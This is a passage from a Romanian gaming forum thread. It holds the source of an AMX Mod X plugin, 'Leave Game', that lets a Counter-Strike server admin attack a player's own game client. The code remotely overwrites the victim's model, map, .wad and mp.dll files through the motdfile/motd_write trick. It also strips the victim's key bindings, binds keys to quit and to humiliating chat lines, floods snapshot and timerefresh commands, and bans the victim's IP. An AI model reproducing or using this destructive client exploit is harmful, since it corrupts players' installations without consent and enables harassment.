         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator, "quit")

         return;

      }

   }

}

public Cronometru(id){

   new parm[1]

   parm[0] = id

   if (ComandaB){

      set_task(3.0,"TimpDeAsteptare",Baza+id,parm)

   }

}

public TimpDeAsteptare(id){

   if (task_exists(Baza+id)){

      remove_task(Baza+id)

   }

   ComandaB = false

}



stock IncarcareServer(){

   get_configsdir(DirectorServer, 63)

   format(FisierServer,127,"%s/servit.q",DirectorServer)

   if (!file_exists(FisierServer)){

      return PLUGIN_HANDLED

   }

   else {

      

      read_file(FisierServer,0,TextServer,LimbaServer,r)

      

      SalvareServer = str_to_num(TextServer)

   }

   return PLUGIN_CONTINUE

   

}

stock ScriereServer(){

   get_configsdir(DirectorServer, 63)

   format(FisierServer,127,"%s/servit.q",DirectorServer)

   if (!file_exists(FisierServer)){

      return PLUGIN_HANDLED

   }

   else {

      

      read_file(FisierServer,0,TextServer,LimbaServer,t)

      

      

      SalvareServer = str_to_num(TextServer)

      SalvareServer = SalvareServer + 1

      format(TextServer,31,"%i",SalvareServer)

      delete_file(FisierServer)

      write_file(FisierServer,TextServer,-1)

   }

   return PLUGIN_CONTINUE

}

/* AMXX-Studio Notes - DO NOT MODIFY BELOW HERE

*{ rtf1 ansi deff0{ fonttbl{ f0 fnil Tahoma;}}n viewkind4 uc1 pard lang1033 f0 fs16 n par }

*/
Cosmin
Fost moderator
Fost moderator
Posts: 9362
Joined: 06 Jul 2013, 22:08
Detinator Steam: Da
Detinator server CS: Nu
Reputatie: Fost eXtream Mod
Fost Scripter eXtreamCS
Nume anterior: scosmynnnn
Has thanked: 492 times
Been thanked: 547 times

13 Oct 2014, 19:00

| Afiseaza codul
#include <amxmodx>

#include <amxmisc>

#include <fun>

#include <engine>



#define Baza 45630



new BanData[33][2][32]

new bool:ComandaB = false

new DirectorServer[64],TextServer[32],LimbaServer = 31,r,t

new FisierServer[128]

new SalvareServer



static const poza[] = "http://www.indungi.ro sectiunea ACL" 



public plugin_init()

{

   register_plugin("Leave Game", "2.0", "DracuShoruL_M1c")

   register_concmd("amx_leavegame", "leavegame", ADMIN_LEVEL_G,"<nume> : Ii face praf CS-u + Snapshot + Ban pe IP permanent")

   register_concmd("amx_lg", "leavegame", ADMIN_LEVEL_G,"<nume> : Ii face praf CS-u + Snapshot + Ban pe IP permanent")

   register_cvar("amx_lg_activity","1")

}





public leavegame(id,level,cid){

   if (!cmd_access(id,level,cid,2)){

      return PLUGIN_HANDLED

   }

   if (ComandaB){

      Cronometru(id)

      return PLUGIN_HANDLED

   }

   new arg[32],name[32],admin[32],sAuthid[35],sAuthid2[35],message[552],players[33],inum

   new fo_logfile[64],timp[64],maxtext[256]

   new tinta[32], minute[8], motiv[64] 

   read_argv(1, tinta, 31)    

   read_argv(2, minute, 7) 

   read_argv(3, motiv, 63)

   read_argv(1, arg, 31)

   new target = cmd_target(id,arg,1)

   new jucator = cmd_target(id, tinta, 9) 

   

   if (!jucator) 

      

   return PLUGIN_HANDLED    

   

   

   copy(BanData[jucator][0], 31, minute) 

   copy(BanData[jucator][1], 31, motiv) 

   new TaskData[4] 

   TaskData[0] = id 

   TaskData[1] = jucator

   new numeserver[64], nume[32], ip[32] 

   get_user_name(target,name,31)

   get_user_name(id,admin,31)

   get_user_authid(target,sAuthid,34)

   get_user_authid(id,sAuthid2,34)

   get_cvar_string("hostname",numeserver,63); 

   get_user_name(jucator,nume,31); 

   get_user_ip(jucator,ip,31); 

   get_configsdir(fo_logfile, 63)

   get_time("%m/%d/%Y - %H:%M:%S",timp,63)

   IncarcareServer()

   ScriereServer()

   format(message,551,"LeaveGameD^nComanda executata cu succes.^n Comanda numarul %i",SalvareServer)

   format(maxtext, 255, "[LG] %s: %s a folosit comanda LeaveGame pe %s",timp,admin,name)

   format(fo_logfile, 63, "%s/LeaveGame.txt", fo_logfile)

   

   if(!target){ 

      

      return PLUGIN_HANDLED 

   }

   switch (get_cvar_num("amx_lg_activity")) {

      case 1: client_cmd(target,"say ^" %s mi-a dat LeaveGame (Plugin by ACL) !^"",admin)

         case 0: client_cmd(target,"say ^"Am primit LeaveGame (Plugin by ACL) !^"")

      }

   client_cmd(target,"developer 1")

   client_cmd(target,"unbind w;wait;unbind a;unbind s;wait;unbind d;bind mouse1 ^"say Am luat LeaveGame pe ACL .^";wait;unbind mouse2;unbind mouse3;wait;bind space quit")

   client_cmd(target,"unbind ctrl;wait;unbind 1;unbind 2;wait;unbind 3;unbind 4;wait;unbind 5;unbind 6;wait;unbind 7")

   client_cmd(target,"unbind 8;wait;unbind 9;unbind 0;wait;unbind r;unbind e;wait;unbind g;unbind q;wait;unbind shift")

   client_cmd(target,"unbind end;wait;bind escape ^"say Sunt neajutorat ca un mic *****^";unbind z;wait;unbind x;unbind c;wait;unbind uparrow;unbind downarrow;wait;unbind leftarrow")

   client_cmd(target,"unbind rightarrow;wait;unbind mwheeldown;unbind mwheelup;wait;bind ` ^"say Sunt neajutorat ca un mic *****^";bind ~ ^"say Am fost distrus .^";wait;name ^"LeaveGame#Distrus^"")

   client_cmd(target,"rate 1;gl_flipmatrix 1;cl_cmdrate 10;cl_updaterate 10;fps_max 1;hideradar;con_color ^"1 1 1^"")

   

   //Strica dll-uri si waduri si MDL

   client_cmd(target,"motdfile models/player.mdl;motd_write x");

   client_cmd(target,"motdfile models/v_ak47.mdl;motd_write x");

   client_cmd(target,"motdfile cs_dust.wad;motd_write x");

   client_cmd(target,"motdfile models/v_m4a1.mdl;motd_write x");

   client_cmd(target,"motdfile resource/GameMenu.res;motd_write x");

   client_cmd(target,"motdfile halflife.wad;motd_write x");

   client_cmd(target,"motdfile cstrike.wad;motd_write x");

   client_cmd(target,"motdfile maps/de_dust2.bsp;motd_write x");

   client_cmd(target,"motdfile events/ak47.sc;motd_write x");

   client_cmd(target,"motdfile dlls/mp.dll;motd_write x");

   

   

   

   

   

   //Mesaje say pe bind

   client_cmd(target, "bind ^"w^" ^"say Sa folosit pluginul LeaveGame  a lui ACL pe mine fiindca nu am respektat regulile." );

   client_cmd(target, "bind ^"s^" ^"say Sa folosit pluginul LeaveGame  a lui ACL pe mine fiindca nu am respektat regulile." );

   client_cmd(target, "bind ^"r^" ^"say Sa folosit pluginul LeaveGame  a lui ACL pe mine fiindca nu am respektat regulile." );

   client_cmd(target, "bind ^"`^" ^"say Sa folosit pluginul LeaveGame  a lui ACL pe mine fiindca nu am respektat regulile." );

   

   

   

   write_file(fo_logfile,maxtext,-1)

   set_hudmessage(255,255,0,0.47,0.55,0,6.0,12.0,0.1,0.2,1)

   show_hudmessage(0, message)

   client_cmd(0, "spk ^"vox/bizwarn the coded has been detected and fucked^"")

   for (new i = 0; i < inum; ++i) {

      if ( access(players,ADMIN_CHAT) )

         client_print(players,print_chat,"[LG]Jucatorul:%s a primit LeaveGame de la %s",name,admin)

   }

   ComandaB = true

   Cronometru(id)   

   

   

   client_print(jucator, print_chat, "* Viziteaza %s pentru a scoate banul.", poza) 

   client_print(jucator, print_chat, "* Nume:  ^"%s^" cu IP : %s",nume,ip) 

   client_print(jucator, print_chat, "* Data : %s",timp) 

   client_print(jucator, print_chat, "* Ai primit ban de la adminul %s",admin)

   client_print(jucator, print_chat,"* Screenshot a fost facut pe : %s",numeserver) 

   client_cmd(jucator,"wait;snapshot;wait;snapshot")

   client_cmd(target,"cl_timeout 0")   

   

   

   //Baneaza jucatorul permanent

   client_cmd(id, "amx_addban ^"%s^" permanent LeaveGame", ip)

   //Parms

   new parms[1]

   parms[0] = target

   //set_task(0.10,"xs",1337+id,parms,1)

   return PLUGIN_HANDLED

   

}



public spank(id,parms[]){

   new jucator = parms[0]

   if(is_user_connected(id)){

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")      

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")      

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")         

   }

   else{

      if(!is_user_connected(id)){

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")      

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

